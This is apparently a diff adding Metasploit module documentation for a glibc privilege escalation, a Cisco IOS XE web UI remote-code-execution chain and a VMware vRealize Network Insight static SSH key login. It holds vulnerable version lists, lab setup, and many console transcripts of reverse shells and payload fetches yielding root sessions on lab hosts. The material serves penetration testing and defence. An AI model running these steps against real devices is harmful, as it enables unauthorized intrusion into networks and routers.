||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.123.1 yes The listen address (an interface may be specified)
|
||||
LPORT 5555 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Auto
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/local/glibc_tunables_priv_esc) > set lport 5555
|
||||
lport => 5555
|
||||
msf6 exploit(linux/local/glibc_tunables_priv_esc) > set lhost 192.168.123.1
|
||||
lhost => 192.168.123.1
|
||||
msf6 exploit(linux/local/glibc_tunables_priv_esc) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.123.1:5555
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. The glibc version (2.36-9+deb12u1) found on the target appears to be vulnerable
|
||||
[+] The Build ID for ld.so: a99db3715218b641780b04323e4ae5953d68a927 is in the list of supported Build IDs for the exploit.
|
||||
[+] The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.
|
||||
[*] Sending stage (3045380 bytes) to 192.168.123.229
|
||||
[*] Meterpreter session 3 opened (192.168.123.1:5555 -> 192.168.123.229:50370) at 2023-12-19 12:21:34 -0500
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
meterpreter > sysinfo
|
||||
Computer : debian.test.com
|
||||
OS : Debian 12.1 (Linux 6.1.0-10-amd64)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter >
|
||||
```
|
||||
@@ -0,0 +1,398 @@
|
||||
## Vulnerable Application
|
||||
This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE
|
||||
devices which have the Web UI exposed. An attacker can execute a payload with root privileges.
|
||||
|
||||
The vulnerable IOS XE versions are:
|
||||
16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,
|
||||
16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,
|
||||
16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,
|
||||
16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,
|
||||
16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,
|
||||
16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,
|
||||
16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,
|
||||
16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,
|
||||
16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,
|
||||
16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,
|
||||
16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,
|
||||
16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,
|
||||
16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,
|
||||
17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,
|
||||
17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,
|
||||
17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,
|
||||
17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,
|
||||
17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,
|
||||
17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,
|
||||
17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,
|
||||
17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
|
||||
17.11.99SW
|
||||
|
||||
## Testing
|
||||
This module was tested against IOS XE version 16.12.3 and version 17.3.2. To test this module you will need to either:
|
||||
|
||||
* Acquire a hardware device running one of the vulnerable firmware versions listed above.
|
||||
|
||||
Or
|
||||
|
||||
* Setup a virtualized environment.
|
||||
* A [CSR1000V](https://www.cisco.com/c/en/us/products/routers/cloud-services-router-1000v-series/index.html) device
|
||||
can be virtualized using [GNS3](https://www.gns3.com/) and VMWare Workstation/Player. Follow the
|
||||
[Windows setup guide](https://docs.gns3.com/docs/getting-started/installation/windows) to install GNS3 and the
|
||||
[topology guide](https://docs.gns3.com/docs/getting-started/your-first-gns3-topology) to learn how GNS3 can be used.
|
||||
* A suitable firmware image for testing would be `csr1000v-universalk9.16.12.03-serial.qcow2`.
|
||||
* When setting up GNS3, run the `GNS3 2.2.43` Virtual Machine for deploying QEMU based devices.
|
||||
* Create a new CSR1000v instance as a QEMU device.
|
||||
* The CSR1000v device's first ethernet adapter `Gi1` should be connected to a Cloud device, whose adapter was bridged
|
||||
to the physical adapter on the host machine, allowing an IP address to be assigned via DHCP, and allowing the Web UI to
|
||||
be accessible to a remote attacker.
|
||||
* When the virtual router has booted up, you must enable the vulnerable WebUI component. From a serial console on
|
||||
the device:
|
||||
```
|
||||
Router>enable
|
||||
Router#config
|
||||
Router(config)#ip http server
|
||||
router(config)#ip http secure-server
|
||||
router(config)#ip http authentication local
|
||||
router(config)#username admin privilege 15 secret qwerty
|
||||
router(config)#exit
|
||||
Router#copy running-config startup-config
|
||||
```
|
||||
* You should now be able to access the WebUI via https://TARGET_IP_ADDRESS/webui and login with admin:qwerty
|
||||
|
||||
## Verification Steps
|
||||
1. Start msfconsole
|
||||
2. `use exploit/linux/misc/cisco_ios_xe_rce`
|
||||
3. `set RHOST <TARGET_IP_ADDRESS>`
|
||||
4. `set target 0`
|
||||
5. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
|
||||
6. `check`
|
||||
7. `exploit`
|
||||
|
||||
## Options
|
||||
|
||||
### CISCO_VRF_NAME
|
||||
We allow a user to specify the VRF name to route traffic for the payloads network transport. The default of
|
||||
'global' should work, but exposing this as an option will allow for usage in more complex network setups.
|
||||
A user could leverage the auxiliary module auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 to
|
||||
inspect a devices configuration to see an appropriate VRF to use.
|
||||
|
||||
### CISCO_CMD_TIMEOUT
|
||||
We may need to try and execute a command a second time if it fails the first time. This option is the maximum
|
||||
number of seconds to keep trying.
|
||||
|
||||
## Scenarios
|
||||
To support a broad set of available payloads, we support both a Linux target and a Unix Target (IOS XE is Linux based).
|
||||
This allows for native Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell.
|
||||
|
||||
### Linux Command (IOS XE 17.3.2)
|
||||
|
||||
```
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set RHOST 192.168.86.58
|
||||
RHOST => 192.168.86.58
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 0
|
||||
target => 0
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
[+] 192.168.86.58:443 - The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options
|
||||
|
||||
Module options (exploit/linux/misc/cisco_ios_xe_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CISCO_CMD_TIMEOUT 30 yes The maximum timeout (in seconds) to wait when trying to execute a command.
|
||||
CISCO_VRF_NAME global yes The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.86.58 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILENAME dDrTvTlqxwoK no Name to use on remote system when storing payload; cannot contain spaces.
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces.
|
||||
LHOST 192.168.86.42 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Linux Command
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.86.42:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
|
||||
[*] Created privilege 15 user 'sqVXixoV' with password 'ZiPbsXBu'
|
||||
[*] Removing user 'sqVXixoV'
|
||||
[*] Sending stage (3045380 bytes) to 192.168.86.58
|
||||
[*] Meterpreter session 6 opened (192.168.86.42:4444 -> 192.168.86.58:64970) at 2023-11-06 17:01:06 +0000
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
meterpreter > sysinfo
|
||||
Computer : router
|
||||
OS : (Linux 4.19.106)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
```
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
|
||||
payload => cmd/linux/http/x64/shell/reverse_tcp
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.86.42:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
|
||||
[*] Created privilege 15 user 'pfGnCwkI' with password 'YhTwxBLK'
|
||||
[*] Removing user 'pfGnCwkI'
|
||||
[*] Sending stage (38 bytes) to 192.168.86.58
|
||||
[*] Command shell session 7 opened (192.168.86.42:4444 -> 192.168.86.58:64994) at 2023-11-06 17:01:44 +0000
|
||||
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
|
||||
uname -a
|
||||
Linux router 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
|
||||
exit
|
||||
[*] 192.168.86.58 - Command shell session 7 closed.
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) >
|
||||
```
|
||||
|
||||
### Linux Command (IOS XE 16.12.3)
|
||||
|
||||
```
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options
|
||||
|
||||
Module options (exploit/linux/misc/cisco_ios_xe_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CISCO_CMD_TIMEOUT 30 yes The maximum timeout (in seconds) to wait when trying to execute a command.
|
||||
CISCO_VRF_NAME global yes The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.86.59 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILENAME ytfnShmfT no Name to use on remote system when storing payload; cannot contain spaces.
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces.
|
||||
LHOST 192.168.86.42 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Linux Command
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > check
|
||||
[+] 192.168.86.59:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.86.42:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
|
||||
[*] Created privilege 15 user 'lwWQIDaS' with password 'dADCGJpS'
|
||||
[*] Removing user 'lwWQIDaS'
|
||||
[*] Sending stage (3045380 bytes) to 192.168.86.59
|
||||
[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.59:56554) at 2023-11-06 16:41:06 +0000
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
meterpreter > sysinfo
|
||||
Computer : router
|
||||
OS : (Linux 4.19.64)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
```
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 0
|
||||
target => 0
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
|
||||
payload => cmd/linux/http/x64/shell/reverse_tcp
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.86.42:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
|
||||
[*] Created privilege 15 user 'NjAmOioM' with password 'tOHjWGyw'
|
||||
[*] Removing user 'NjAmOioM'
|
||||
[*] Sending stage (38 bytes) to 192.168.86.59
|
||||
[*] Command shell session 5 opened (192.168.86.42:4444 -> 192.168.86.59:56598) at 2023-11-06 16:44:48 +0000
|
||||
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
|
||||
uname -a
|
||||
Linux router 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
|
||||
exit
|
||||
[*] 192.168.86.59 - Command shell session 5 closed.
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) >
|
||||
```
|
||||
|
||||
### Unix Target (IOS XE 17.3.2)
|
||||
|
||||
```
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 1
|
||||
target => 1
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
|
||||
payload => cmd/unix/python/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.86.42:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
|
||||
[*] Created privilege 15 user 'JAonVuJS' with password 'vYecWhWk'
|
||||
[*] Removing user 'JAonVuJS'
|
||||
[*] Sending stage (24772 bytes) to 192.168.86.58
|
||||
[*] Meterpreter session 8 opened (192.168.86.42:4444 -> 192.168.86.58:65016) at 2023-11-06 17:03:34 +0000
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
meterpreter > sysinfo
|
||||
Computer : router
|
||||
OS : Linux 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020
|
||||
Architecture : x64
|
||||
Meterpreter : python/linux
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
```
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
|
||||
payload => cmd/unix/reverse_bash
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.86.42:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
|
||||
[*] Created privilege 15 user 'TVtEhbdd' with password 'NtRvujcZ'
|
||||
[*] Removing user 'TVtEhbdd'
|
||||
[*] Command shell session 9 opened (192.168.86.42:4444 -> 192.168.86.58:65036) at 2023-11-06 17:04:28 +0000
|
||||
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
|
||||
uname -a
|
||||
Linux router 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
|
||||
exit
|
||||
[*] 192.168.86.58 - Command shell session 9 closed.
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) >
|
||||
```
|
||||
|
||||
### Unix Target (IOS XE 16.12.3)
|
||||
|
||||
```
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 1
|
||||
target => 1
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
|
||||
payload => cmd/unix/python/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options
|
||||
|
||||
Module options (exploit/linux/misc/cisco_ios_xe_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CISCO_CMD_TIMEOUT 30 yes The maximum timeout (in seconds) to wait when trying to execute a command.
|
||||
CISCO_VRF_NAME global yes The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.86.59 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/unix/python/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.86.42 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
1 Unix Command
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > check
|
||||
[+] 192.168.86.59:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.86.42:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
|
||||
[*] Created privilege 15 user 'pJaWZBTl' with password 'KlcuLPaJ'
|
||||
[*] Removing user 'pJaWZBTl'
|
||||
[*] Sending stage (24772 bytes) to 192.168.86.59
|
||||
[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.59:56572) at 2023-11-06 16:42:36 +0000
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
meterpreter > sysinfo
|
||||
Computer : router
|
||||
OS : Linux 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019
|
||||
Architecture : x64
|
||||
Meterpreter : python/linux
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
```
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
|
||||
payload => cmd/unix/reverse_bash
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.86.42:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
|
||||
[*] Created privilege 15 user 'aZIYJugi' with password 'RziZqysr'
|
||||
[*] Removing user 'aZIYJugi'
|
||||
[*] Command shell session 4 opened (192.168.86.42:4444 -> 192.168.86.59:56584) at 2023-11-06 16:43:30 +0000
|
||||
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
|
||||
uname -a
|
||||
Linux router 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
|
||||
exit
|
||||
[*] 192.168.86.59 - Command shell session 4 closed.
|
||||
msf6 exploit(linux/misc/cisco_ios_xe_rce) >
|
||||
```
|
||||
@@ -0,0 +1,240 @@
|
||||
## Vulnerable Application
|
||||
|
||||
VMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0
|
||||
do not randomize the SSH keys on virtual machine initialization. Since the key is easily
|
||||
retrievable, an attacker can use it to gain unauthorized remote access as the "support" (root) user.
|
||||
|
||||
### Install
|
||||
|
||||
The ova files can be downloaded directly from VMWare. Depending on the license, only the most current (non-vulnerable)
|
||||
images may be available.
|
||||
|
||||
If this is the case, we can emulate the user and keys with the following commands on Kali with SSH installed and running:
|
||||
|
||||
```
|
||||
sudo adduser 'support'
|
||||
sudo mkdir /home/support/.ssh
|
||||
sudo touch /home/support/.ssh/authorized_keys
|
||||
for filename in data/exploits/CVE-2023-34039/*; do
|
||||
ssh-keygen -f "$filename" -y | sudo tee -a /home/support/.ssh/authorized_keys
|
||||
done
|
||||
sudo chown support:support /home/support/.ssh
|
||||
sudo chown support:support /home/support/.ssh/authorized_keys
|
||||
sudo chmod 644 /home/support/.ssh/authorized_keys
|
||||
sudo chmod 700 /home/support/.ssh
|
||||
```
|
||||
|
||||
### Logs
|
||||
|
||||
Logs produced from this login will look like:
|
||||
|
||||
Failed login attempt:
|
||||
|
||||
`Oct 17 16:28:29 localhost sshd[51258]: Connection closed by authenticating user support 1.1.1.1 port 45463 [preauth]`
|
||||
|
||||
Successful login attempt:
|
||||
|
||||
`Oct 17 16:28:29 localhost sshd[51276]: Accepted publickey for support from 1.1.1.1 port 33913 ssh2: RSA SHA256:qhEwh/jQFLZqaOTAoUmp3B3+B4bIA2QgfxsvQ/HQO7o`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application or ssh keys
|
||||
1. Start msfconsole
|
||||
1. Do: `use exploit/linux/ssh/vmware_vrni_known_privkey`
|
||||
1. Do: `set rhosts [IP]`
|
||||
1. Do: `run`
|
||||
1. You should get a root level shell
|
||||
|
||||
## Options
|
||||
|
||||
### STOP_ON_SUCCESS
|
||||
|
||||
Stop SSH login attempts after the first session is obtained. Defaults to `true`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Emulated user on Kali Linux
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/ssh/vmware_vrni_known_privkey
|
||||
[*] Using configured payload cmd/unix/interact
|
||||
msf6 exploit(linux/ssh/vmware_vrni_known_privkey) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
msf6 exploit(linux/ssh/vmware_vrni_known_privkey) > set verbose true
|
||||
verbose => true
|
||||
msf6 exploit(linux/ssh/vmware_vrni_known_privkey) > set stop_on_success false
|
||||
stop_on_success => false
|
||||
msf6 exploit(linux/ssh/vmware_vrni_known_privkey) > run
|
||||
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.0.0_platform
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.0.0_platform
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.0.0_proxy
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.0.0_proxy
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.10.0_collector
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.10.0_collector
|
||||
[*] Command shell session 1 opened (127.0.0.1:36397 -> 127.0.0.1:22) at 2023-10-16 11:55:52 -0400
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.10.0_platform
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.10.0_platform
|
||||
[*] Command shell session 2 opened (127.0.0.1:41437 -> 127.0.0.1:22) at 2023-10-16 11:55:55 -0400
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.1.0_platform
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.1.0_platform
|
||||
[*] Command shell session 3 opened (127.0.0.1:35585 -> 127.0.0.1:22) at 2023-10-16 11:55:58 -0400
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.1.0_proxy
|
||||
[*] Command shell session 4 opened (127.0.0.1:41267 -> 127.0.0.1:22) at 2023-10-16 11:56:01 -0400
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.1.0_proxy
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.2.0_collector
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.2.0_collector
|
||||
[*] Command shell session 6 opened (127.0.0.1:37865 -> 127.0.0.1:22) at 2023-10-16 11:56:13 -0400
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.2.0_platform
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.2.0_platform
|
||||
[*] Command shell session 7 opened (127.0.0.1:41153 -> 127.0.0.1:22) at 2023-10-16 11:56:21 -0400
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.3.0_collector
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.3.0_collector
|
||||
[*] Command shell session 8 opened (127.0.0.1:40331 -> 127.0.0.1:22) at 2023-10-16 11:56:29 -0400
|
||||
